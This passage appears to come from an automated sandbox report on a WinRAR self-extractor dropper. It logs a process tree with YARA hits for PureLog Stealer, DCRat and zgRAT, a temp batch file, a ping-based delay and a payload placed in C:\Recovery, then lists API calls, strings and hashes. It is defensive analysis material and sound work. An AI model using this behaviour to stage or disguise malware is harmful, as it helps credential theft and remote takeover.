JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\webCrt\Surrogatedll.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\webCrt\Surrogatedll.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\webCrt\Surrogatedll.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\webCrt\Surrogatedll.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 63%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	21:12:05
Start date:	05/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8438IKeNWT.bat"
Imagebase:	0x7ff72c2f0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	21:12:05
Start date:	05/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	21:12:05
Start date:	05/12/2024
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff6e3410000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	21:12:05
Start date:	05/12/2024
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff6f6e10000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	21:12:14
Start date:	05/12/2024
Path:	C:\Recovery\EeMFgDHDyZvTl.exe
Wow64 process (32bit):	false
Commandline:	"C:\Recovery\EeMFgDHDyZvTl.exe"
Imagebase:	0x7a0000
File size:	1'918'976 bytes
MD5 hash:	9FC3AB56804D6BA50E840846783E8AC1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000B.00000002.4562754351.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000B.00000002.4562754351.000000000304E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\EeMFgDHDyZvTl.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\EeMFgDHDyZvTl.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 63%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.3%
Total number of Nodes:	1490
Total number of Limit Nodes:	46

Executed Functions

Function 0023DF1E Relevance: 42.2, APIs: 17, Strings: 7, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00230863: GetModuleHandleW.KERNEL32(kernel32), ref: 0023087C
Part of subcall function 00230863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0023088E
Part of subcall function 00230863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002308BF

Part of subcall function 0023A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0023A655

Part of subcall function 0023AC16: OleInitialize.OLE32(00000000), ref: 0023AC2F
Part of subcall function 0023AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0023AC66
Part of subcall function 0023AC16: SHGetMalloc.SHELL32(00268438), ref: 0023AC70

GetCommandLineW.KERNEL32 ref: 0023DF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0023DF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0023DF94
UnmapViewOfFile.KERNEL32(00000000), ref: 0023DFCE

Part of subcall function 0023DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0023DBF4
Part of subcall function 0023DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0023DC30

CloseHandle.KERNEL32(00000000), ref: 0023DFD7
GetModuleFileNameW.KERNEL32(00000000,0027EC90,00000800), ref: 0023DFF2
SetEnvironmentVariableW.KERNEL32(sfxname,0027EC90), ref: 0023DFFE
GetLocalTime.KERNEL32(?), ref: 0023E009
_swprintf.LIBCMT ref: 0023E048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0023E05A
GetModuleHandleW.KERNEL32(00000000), ref: 0023E061
LoadIconW.USER32(00000000,00000064), ref: 0023E078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0023E0C9
Sleep.KERNEL32(?), ref: 0023E0F7
DeleteObject.GDI32 ref: 0023E130
DeleteObject.GDI32(?), ref: 0023E140
CloseHandle.KERNEL32 ref: 0023E183

Strings

%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 0023E039
sfxstime, xrefs: 0023E055
C:\Users\user\Desktop, xrefs: 0023DF33
STARTDLG, xrefs: 0023E0BE
winrarsfxmappingfile.tmp, xrefs: 0023DF77
sfxname, xrefs: 0023DFF9
xz', xrefs: 0023E10B

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz'
API String ID: 3049964643-3230041541
Opcode ID: d9ecc55b4497bb7bae3b6f8f5699444691b49a7a2e71aa8d418903f3d3ce1e74
Instruction ID: c347fc078a808e8a575eeaccfb782020a3c8371bd87551334258a5ace2cda95e
Opcode Fuzzy Hash: d9ecc55b4497bb7bae3b6f8f5699444691b49a7a2e71aa8d418903f3d3ce1e74
Instruction Fuzzy Hash: 3F61F5B1524305AFD720EF74BC4DF2B77ACAB09745F00442AF949921D1DBB49DA8CB61

Function 0023A6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0023B73D,00000066), ref: 0023A6D5
SizeofResource.KERNEL32(00000000,?,?,?,0023B73D,00000066), ref: 0023A6EC
LoadResource.KERNEL32(00000000,?,?,?,0023B73D,00000066), ref: 0023A703
LockResource.KERNEL32(00000000,?,?,?,0023B73D,00000066), ref: 0023A712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0023B73D,00000066), ref: 0023A72D
GlobalLock.KERNEL32(00000000), ref: 0023A73E
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0023A762
GlobalUnlock.KERNEL32(00000000), ref: 0023A7C6

Part of subcall function 0023A626: GdipAlloc.GDIPLUS(00000010), ref: 0023A62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0023A7A7
GlobalFree.KERNEL32(00000000), ref: 0023A7CD

Strings

PNG, xrefs: 0023A6C6

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: PNG
API String ID: 211097158-364855578
Opcode ID: 0510e095a9f1d15f1b4aa683a0c75600e0ba42ab352f9702190a63bf9f0badb6
Instruction ID: 8d1a12a2bfcf48fb98d24ea6e161dcfaddb5aba8e1cbbd423bb95b9020c29ad6
Opcode Fuzzy Hash: 0510e095a9f1d15f1b4aa683a0c75600e0ba42ab352f9702190a63bf9f0badb6
Instruction Fuzzy Hash: CD31AFB5610702AFDB119F31EC8CD2BBBB9FF847A1F044529F84582660EB31DC649AA1

Function 0022A69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0022A592,000000FF,?,?), ref: 0022A6C4

Part of subcall function 0022BB03: _wcslen.LIBCMT ref: 0022BB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0022A592,000000FF,?,?), ref: 0022A6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0022A592,000000FF,?,?), ref: 0022A6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,0022A592,000000FF,?,?), ref: 0022A728
GetLastError.KERNEL32(?,?,?,?,0022A592,000000FF,?,?), ref: 0022A734

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: 2b1fd904ee7c860742aa55eee0161481d97e6564e82ab745fccbcf1056aea76d
Instruction ID: 9e76c10b3382e20b049b85370e375d9b0bd8565e0d6e18a270c9841b903be8c5
Opcode Fuzzy Hash: 2b1fd904ee7c860742aa55eee0161481d97e6564e82ab745fccbcf1056aea76d
Instruction Fuzzy Hash: 09419472910225ABCB15DFA4DC88AEDF7B8FB48350F104196E55DD3250D7346EA0CF94

Function 00247DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00247DC4,?,0025C300,0000000C,00247F1B,?,00000002,00000000), ref: 00247E0F
TerminateProcess.KERNEL32(00000000,?,00247DC4,?,0025C300,0000000C,00247F1B,?,00000002,00000000), ref: 00247E16
ExitProcess.KERNEL32 ref: 00247E28

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 10dead5ebbe154fc1de040532b5b623ab8a53bf2a2bf875afde281b23877344d
Instruction ID: 1accf2681d0dfdc8362f357b1482c9c9a27038c660fa5386a3d47dc335fd0f0d
Opcode Fuzzy Hash: 10dead5ebbe154fc1de040532b5b623ab8a53bf2a2bf875afde281b23877344d
Instruction Fuzzy Hash: A8E04F31110644ABCF0AAF20DD0D9493F69EB10382B004454F8198B132CB35DE61CA84

Function 0022848E Relevance: 2.5, APIs: 1, Instructions: 960COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00228493

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 35e9523a850182d65b4c9f9ba97180a6582c5f97285b5303d18c942cb19bf835
Instruction ID: 83b255c9deadc0326b5969a290c7a26b8d63a5bb5e7a1a5e78c573c0d9a450a0
Opcode Fuzzy Hash: 35e9523a850182d65b4c9f9ba97180a6582c5f97285b5303d18c942cb19bf835
Instruction Fuzzy Hash: D7824070925166BEDF15DFE0D481BFAB7B9BF15300F0841B9E8499B142CF719AA8CB60

Function 00236CDC Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 4177124de5e4f069d637266063617eb514dc14e5bd5ff3af05cab93adc3f4028
Instruction ID: 313003cd9c48d76bd245d0ac10846a85370aeb513a575042676e6b404046810a
Opcode Fuzzy Hash: 4177124de5e4f069d637266063617eb514dc14e5bd5ff3af05cab93adc3f4028
Instruction Fuzzy Hash: 92D108F16183459FDB24CF28C88475BBBE5BF89308F04856DE8899B342D774E928CB56

Function 0023B7E0 Relevance: 107.5, APIs: 48, Strings: 13, Instructions: 731windowfilesleepCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0023B7E5

Part of subcall function 00221316: GetDlgItem.USER32(00000000,00003021), ref: 0022135A
Part of subcall function 00221316: SetWindowTextW.USER32(00000000,002535F4), ref: 00221370

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0023B8D1
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0023B8EF
IsDialogMessageW.USER32(?,?), ref: 0023B902
TranslateMessage.USER32(?), ref: 0023B910
DispatchMessageW.USER32(?), ref: 0023B91A
GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0023B93D
KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0023B960
GetDlgItem.USER32(?,00000068), ref: 0023B983
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0023B99E
SendMessageW.USER32(00000000,000000C2,00000000,002535F4), ref: 0023B9B1

Part of subcall function 0023D453: _wcschr.LIBVCRUNTIME ref: 0023D45C
Part of subcall function 0023D453: _wcslen.LIBCMT ref: 0023D47D

SetFocus.USER32(00000000), ref: 0023B9B8
_swprintf.LIBCMT ref: 0023BA24

Part of subcall function 00224092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002240A5

Part of subcall function 0023D4D4: GetDlgItem.USER32(00000068,0027FCB8), ref: 0023D4E8
Part of subcall function 0023D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0023AF07,00000001,?,?,0023B7B9,0025506C,0027FCB8,0027FCB8,00001000,00000000,00000000), ref: 0023D510
Part of subcall function 0023D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0023D51B
Part of subcall function 0023D4D4: SendMessageW.USER32(00000000,000000C2,00000000,002535F4), ref: 0023D529
Part of subcall function 0023D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0023D53F
Part of subcall function 0023D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0023D559
Part of subcall function 0023D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0023D59D
Part of subcall function 0023D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0023D5AB
Part of subcall function 0023D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0023D5BA
Part of subcall function 0023D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0023D5E1
Part of subcall function 0023D4D4: SendMessageW.USER32(00000000,000000C2,00000000,002543F4), ref: 0023D5F0

GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0023BA68
GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0023BA90
GetTickCount.KERNEL32 ref: 0023BAAE
_swprintf.LIBCMT ref: 0023BAC2
GetLastError.KERNEL32(?,00000011), ref: 0023BAF4
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0023BB43
_swprintf.LIBCMT ref: 0023BB7C
CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0023BBD0
GetCommandLineW.KERNEL32 ref: 0023BBEA
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0023BC47
ShellExecuteExW.SHELL32(0000003C), ref: 0023BC6F
Sleep.KERNEL32(00000064), ref: 0023BCB9
UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0023BCE2
CloseHandle.KERNEL32(00000000), ref: 0023BCEB
_swprintf.LIBCMT ref: 0023BD1E
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0023BD7D
SetDlgItemTextW.USER32(?,00000065,002535F4), ref: 0023BD94
GetDlgItem.USER32(?,00000065), ref: 0023BD9D
GetWindowLongW.USER32(00000000,000000F0), ref: 0023BDAC
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0023BDBB
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0023BE68
_wcslen.LIBCMT ref: 0023BEBE
_swprintf.LIBCMT ref: 0023BEE8
SendMessageW.USER32(?,00000080,00000001,?), ref: 0023BF32
SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0023BF4C
GetDlgItem.USER32(?,00000068), ref: 0023BF55
SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0023BF6B
GetDlgItem.USER32(?,00000066), ref: 0023BF85
SetWindowTextW.USER32(00000000,0026A472), ref: 0023BFA7
SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0023C007
SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0023C01A
DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0023C0BD
EnableWindow.USER32(00000000,00000000), ref: 0023C197
SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0023C1D9

Part of subcall function 0023C73F: __EH_prolog.LIBCMT ref: 0023C744

SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0023C1FD

Strings

__tmp_rar_sfx_access_check_%u, xrefs: 0023BAB5
@, xrefs: 0023BB91
Q%, xrefs: 0023BBBC
-el -s2 "-d%s" "-sp%s", xrefs: 0023BB6B
%s, xrefs: 0023BED8
LICENSEDLG, xrefs: 0023C0B2
<, xrefs: 0023BB84
"%s"%s, xrefs: 0023BD0D
h#, xrefs: 0023BCA5
C:\Users\user\Desktop, xrefs: 0023BBC9
STARTDLG, xrefs: 0023B801
winrarsfxmappingfile.tmp, xrefs: 0023BBA6
^#, xrefs: 0023C1E1

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$^#$__tmp_rar_sfx_access_check_%u$h#$winrarsfxmappingfile.tmp$Q%
API String ID: 3829768659-4288590559
Opcode ID: 5e6502c68ac3da222dfe63f84c0f41570c0730d7e64cec4f1dd1fd9a822371c1
Instruction ID: 9aefda74820c4004ba358c4af99ae13d476d7148206e44b916e3da8166fc74dc
Opcode Fuzzy Hash: 5e6502c68ac3da222dfe63f84c0f41570c0730d7e64cec4f1dd1fd9a822371c1
Instruction Fuzzy Hash: 8642E3B1964255BAEB22EFB0AC4EFBE776CAB01B00F104155F644B60D2CBB45A64CF61

Function 00230863 Relevance: 98.3, APIs: 23, Strings: 33, Instructions: 316
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(kernel32), ref: 0023087C
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0023088E
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002308BF
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00230B69
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00230B83
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00230B93
ReadFile.KERNEL32(00000000,?,00007FFE,|<%,00000000), ref: 00230BB1
CloseHandle.KERNEL32(00000000), ref: 00230C09
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00230C1E
CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<%,?,00000000,?,00000800), ref: 00230C72
GetFileAttributesW.KERNELBASE(?,?,|<%,00000800,?,00000000,?,00000800), ref: 00230C9C
GetFileAttributesW.KERNEL32(?,?,D=%,00000800), ref: 00230CD8

Part of subcall function 0023081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00230836
Part of subcall function 0023081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0022F2D8,Crypt32.dll,00000000,0022F35C,?,?,0022F33E,?,?,?), ref: 00230858

_swprintf.LIBCMT ref: 00230D4A
_swprintf.LIBCMT ref: 00230D96

Part of subcall function 00224092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002240A5

AllocConsole.KERNEL32 ref: 00230D9E
GetCurrentProcessId.KERNEL32 ref: 00230DA8
AttachConsole.KERNEL32(00000000), ref: 00230DAF
_wcslen.LIBCMT ref: 00230DC4
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00230DD5
WriteConsoleW.KERNEL32(00000000), ref: 00230DDC
Sleep.KERNEL32(00002710), ref: 00230DE7
FreeConsole.KERNEL32 ref: 00230DED
ExitProcess.KERNEL32 ref: 00230DF5

Strings

kernel32, xrefs: 00230873
`@%, xrefs: 00230A6C
dA%, xrefs: 00230AE5
h>%, xrefs: 0023099F
|@%, xrefs: 00230A77
,@%, xrefs: 00230A56
H@%, xrefs: 00230A61
>%, xrefs: 002309C7
HA%, xrefs: 00230ADA
,<%, xrefs: 002308E7
D=%, xrefs: 00230CB9, 00230CC9
0A%, xrefs: 00230ACF
<%, xrefs: 00230917
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00230D84
h=%, xrefs: 00230947
SetDefaultDllDirectories, xrefs: 002308B9
P>%, xrefs: 00230997
?%, xrefs: 00230A35
dwmapi.dll, xrefs: 00230927, 00230D0D
|?%, xrefs: 00230A09
8>%, xrefs: 0023098F
d?%, xrefs: 002309FE
4B%, xrefs: 00230B3D
T=%, xrefs: 0023093F
A%, xrefs: 00230B1C
|<%, xrefs: 00230B9E, 00230BA2
(=%, xrefs: 0023092F
H?%, xrefs: 002309F3
uxtheme.dll, xrefs: 00230D17
0?%, xrefs: 002309E8
DXGIDebug.dll, xrefs: 002308FC, 00230C5E
SetDllDirectoryW, xrefs: 00230888
@%, xrefs: 00230AAE

Memory Dump Source

Source File: 00000000.00000002.2109504296.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2109487602.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109535553.0000000000253000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.000000000025E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000265000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109556186.0000000000282000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2109609094.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_kqq1aAcVUQ.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
String ID: (=%$,<%$,@%$0?%$0A%$4B%$8>%$D=%$DXGIDebug.dll$H?%$H@%$HA%$P>%$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$T=%$`@%$d?%$dA%$dwmapi.dll$h=%$h>%$kernel32$uxtheme.dll$|<%$|?%$|@%$<%$>%$?%$@%$A%
API String ID: 1207345701-3848045456
